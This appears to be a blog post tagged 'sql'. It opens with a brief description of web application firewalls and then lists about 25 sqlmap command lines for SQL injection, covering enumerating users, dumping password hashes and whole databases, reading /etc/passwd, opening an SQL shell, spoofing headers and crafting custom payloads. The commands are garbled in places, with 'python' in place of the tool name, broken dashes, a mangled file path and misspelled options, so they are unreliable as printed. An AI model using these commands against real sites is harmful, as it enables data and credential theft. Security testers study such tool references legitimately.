Posts Tagged ‘sql’

 A web application firewall (or WAF) filters, monitors, and blocks HTTP traffic to and from a web application. A WAF is differentiated from a regular firewall in that a WAF is able to filter the content of specific web applications while regular firewalls serve as a safety gate between servers. By inspecting HTTP traffic, it can prevent attacks stemming from web application security flaws, such as SQL injection, cross-site scripting (XSS), file inclusion, and security mis-configurations.

Some useful sqlmap command for testing SQL injection vulnerability.

1) — Analyzing the current user is dba
python -u “url” –is-dba -v 1
2) — users: user list database management system
python -u “url” –users -v 0
3) — passwords: Database user password (hash)
python -u “url” –passwords -v 0
python -u “url” –passwords -U sa -v 0
4) To view the user permissions
python -u “url” –privileges -v 0
python -u “url” –privileges -U postgres -v 0
5) — dbs can use the database
python -u “url” –dbs -v 0
6) — tables column in a table
python -u “url” –tables -D “information_scheam”
-D: Specifies the name of the data
7) — columns are listed in the table column names
python -u “url” –columns -T “user” -D “mysql” -v 1
-T: Specify the table name, -D: Specifies the library name
8) — dump the contents of the column specified in the list
python -u “url” –dump -T “users” -D “testdb”
-C: You can specify fields
The specified column in the range of 2-4
python -u “url” –dump -T “users” -D “testdb” –start 2 –stop 4 -v 0
9) — dumap-all List all databases, all tables content
python -u “url” –dump-all -v 0
Only lists the contents of the user’s own new database and tables
python -u “url” –dump-all –exclude-sysdbs -v 0
10) — file to read the content of the document [load_file () function]
python -u “url” –file / etc / password
11) execute SQL
python -u “url” –sql-shell
12) -p parameter specified
python -u “url” -v 1 -p “id”
You can specify multiple -p parameter -p “cat, id”
13) POST submission
python -u “url” –method POST –data “id = 1”
14) COOKIE Submit
python -u “url” –cookie “id = 1” -v 1
cookie value can be crawled by the TamperData
15) refer to deceive
python -u “url” –refer “url” -v 3
16) using a custom user-agent or user-agents.txt
python -u “url” –user-agent “Mozilla / 4.0 (compatible; MSIE 7.0; Windows NT 5.1)” -v 3
python -u “url” -v 1 -a “./txt/user-agents.txt”
17) use of multithreading guess solution
python -u “url” -v 1 –current-user –threads 3
18) specify the database, bypassing the automatic detection SQLMAP
python -u “url” -v 2 –dbms “PostgreSQL”
19) Specifies the operating system automatically detects the bypass SQLMAP
python -u “url” -v 2 –os “Windows”
20) — prefix and –postfix custom payload
python -u “url” -v 3 -p “id” –prefix ” ‘” –postfix “and’ test ‘=’ test”
21) union injection test
python -u “url” –union-test -v -1
22) with the order by
python -u “url” –union-test –union-tech orderby -v 1
23) python -u “url” -v 1 –union-use –banner
24) python -u “url” -v 5 –union-use –current-user
25) python -u “url” -v 1 –union-use –dbs